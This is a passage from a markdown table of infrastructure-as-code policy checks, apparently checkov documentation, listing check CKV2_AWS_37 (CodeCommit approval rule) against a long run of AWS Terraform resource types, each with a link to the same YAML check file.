[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 799 | CKV2_AWS_37 | resource | aws_elasticache_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 800 | CKV2_AWS_37 | resource | aws_elasticache_replication_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 801 | 
CKV2_AWS_37 | resource | aws_elasticache_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 802 | CKV2_AWS_37 | resource | aws_elasticache_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 803 | CKV2_AWS_37 | resource | aws_elasticsearch_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 804 | CKV2_AWS_37 | resource | aws_elasticsearch_domain_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 805 | CKV2_AWS_37 | resource | aws_elastictranscoder_pipeline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 806 | CKV2_AWS_37 | resource | aws_elastictranscoder_preset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 807 | CKV2_AWS_37 | resource | aws_elb | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 808 | CKV2_AWS_37 | resource | aws_elb_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 809 | CKV2_AWS_37 | resource | aws_emr_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 810 | CKV2_AWS_37 | resource | aws_emr_instance_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 811 | CKV2_AWS_37 | resource | aws_emr_security_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 812 | CKV2_AWS_37 | resource | aws_flow_log | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 813 | CKV2_AWS_37 | resource | aws_fms_admin_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 814 | CKV2_AWS_37 | resource | aws_fsx_lustre_file_system | Ensure CodeCommit associates an 
approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 815 | CKV2_AWS_37 | resource | aws_fsx_windows_file_system | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 816 | CKV2_AWS_37 | resource | aws_gamelift_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 817 | CKV2_AWS_37 | resource | aws_gamelift_build | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 818 | CKV2_AWS_37 | resource | aws_gamelift_fleet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 819 | CKV2_AWS_37 | resource | aws_gamelift_game_session_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 820 | CKV2_AWS_37 | resource | aws_glacier_vault | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 821 | CKV2_AWS_37 | resource | aws_glacier_vault_lock | 
Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 822 | CKV2_AWS_37 | resource | aws_globalaccelerator_accelerator | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 823 | CKV2_AWS_37 | resource | aws_globalaccelerator_endpoint_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 824 | CKV2_AWS_37 | resource | aws_globalaccelerator_listener | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 825 | CKV2_AWS_37 | resource | aws_glue_catalog_database | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 826 | CKV2_AWS_37 | resource | aws_glue_catalog_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 827 | CKV2_AWS_37 | resource | aws_glue_classifier | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 828 | CKV2_AWS_37 | resource | aws_glue_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 829 | CKV2_AWS_37 | resource | aws_glue_crawler | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 830 | CKV2_AWS_37 | resource | aws_glue_job | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 831 | CKV2_AWS_37 | resource | aws_glue_security_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 832 | CKV2_AWS_37 | resource | aws_glue_trigger | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 833 | CKV2_AWS_37 | resource | aws_glue_workflow | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 834 | CKV2_AWS_37 | resource | aws_guardduty_detector | Ensure CodeCommit associates an approval rule | 
Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 835 | CKV2_AWS_37 | resource | aws_guardduty_invite_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 836 | CKV2_AWS_37 | resource | aws_guardduty_ipset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 837 | CKV2_AWS_37 | resource | aws_guardduty_member | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 838 | CKV2_AWS_37 | resource | aws_guardduty_organization_admin_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 839 | CKV2_AWS_37 | resource | aws_guardduty_organization_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 840 | CKV2_AWS_37 | resource | aws_guardduty_threatintelset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 841 | CKV2_AWS_37 | resource 
| aws_iam_access_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 842 | CKV2_AWS_37 | resource | aws_iam_account_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 843 | CKV2_AWS_37 | resource | aws_iam_account_password_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 844 | CKV2_AWS_37 | resource | aws_iam_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 845 | CKV2_AWS_37 | resource | aws_iam_group_membership | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 846 | CKV2_AWS_37 | resource | aws_iam_group_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 847 | CKV2_AWS_37 | resource | aws_iam_group_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) 
| -| 848 | CKV2_AWS_37 | resource | aws_iam_instance_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 849 | CKV2_AWS_37 | resource | aws_iam_openid_connect_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 850 | CKV2_AWS_37 | resource | aws_iam_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 851 | CKV2_AWS_37 | resource | aws_iam_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 852 | CKV2_AWS_37 | resource | aws_iam_policy_document | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 853 | CKV2_AWS_37 | resource | aws_iam_role | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 854 | CKV2_AWS_37 | resource | aws_iam_role_policy | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 855 | CKV2_AWS_37 | resource | aws_iam_role_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 856 | CKV2_AWS_37 | resource | aws_iam_saml_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 857 | CKV2_AWS_37 | resource | aws_iam_server_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 858 | CKV2_AWS_37 | resource | aws_iam_service_linked_role | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 859 | CKV2_AWS_37 | resource | aws_iam_user | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 860 | CKV2_AWS_37 | resource | aws_iam_user_group_membership | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 861 | CKV2_AWS_37 | resource | aws_iam_user_login_profile | Ensure 
CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 862 | CKV2_AWS_37 | resource | aws_iam_user_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 863 | CKV2_AWS_37 | resource | aws_iam_user_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 864 | CKV2_AWS_37 | resource | aws_iam_user_ssh_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 865 | CKV2_AWS_37 | resource | aws_inspector_assessment_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 866 | CKV2_AWS_37 | resource | aws_inspector_assessment_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 867 | CKV2_AWS_37 | resource | aws_inspector_resource_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 868 
| CKV2_AWS_37 | resource | aws_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 869 | CKV2_AWS_37 | resource | aws_internet_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 870 | CKV2_AWS_37 | resource | aws_iot_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 871 | CKV2_AWS_37 | resource | aws_iot_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 872 | CKV2_AWS_37 | resource | aws_iot_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 873 | CKV2_AWS_37 | resource | aws_iot_role_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 874 | CKV2_AWS_37 | resource | aws_iot_thing | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 875 | 
CKV2_AWS_37 | resource | aws_iot_thing_principal_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 876 | CKV2_AWS_37 | resource | aws_iot_thing_type | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 877 | CKV2_AWS_37 | resource | aws_iot_topic_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 878 | CKV2_AWS_37 | resource | aws_key_pair | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 879 | CKV2_AWS_37 | resource | aws_kinesis_analytics_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 880 | CKV2_AWS_37 | resource | aws_kinesis_firehose_delivery_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 881 | CKV2_AWS_37 | resource | aws_kinesis_stream | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 882 | CKV2_AWS_37 | resource | aws_kinesis_video_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 883 | CKV2_AWS_37 | resource | aws_kms_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 884 | CKV2_AWS_37 | resource | aws_kms_ciphertext | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 885 | CKV2_AWS_37 | resource | aws_kms_external_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 886 | CKV2_AWS_37 | resource | aws_kms_grant | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 887 | CKV2_AWS_37 | resource | aws_kms_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 888 | CKV2_AWS_37 | resource | aws_lambda_alias | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 889 | CKV2_AWS_37 | resource | aws_lambda_event_source_mapping | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 890 | CKV2_AWS_37 | resource | aws_lambda_function | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 891 | CKV2_AWS_37 | resource | aws_lambda_function_event_invoke_config | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 892 | CKV2_AWS_37 | resource | aws_lambda_layer_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 893 | CKV2_AWS_37 | resource | aws_lambda_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 894 | CKV2_AWS_37 | resource | aws_lambda_provisioned_concurrency_config | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 895 | CKV2_AWS_37 | resource | 
aws_launch_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 896 | CKV2_AWS_37 | resource | aws_launch_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 897 | CKV2_AWS_37 | resource | aws_lb | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 898 | CKV2_AWS_37 | resource | aws_lb_cookie_stickiness_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 899 | CKV2_AWS_37 | resource | aws_lb_listener | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 900 | CKV2_AWS_37 | resource | aws_lb_listener_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 901 | CKV2_AWS_37 | resource | aws_lb_listener_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 902 | 
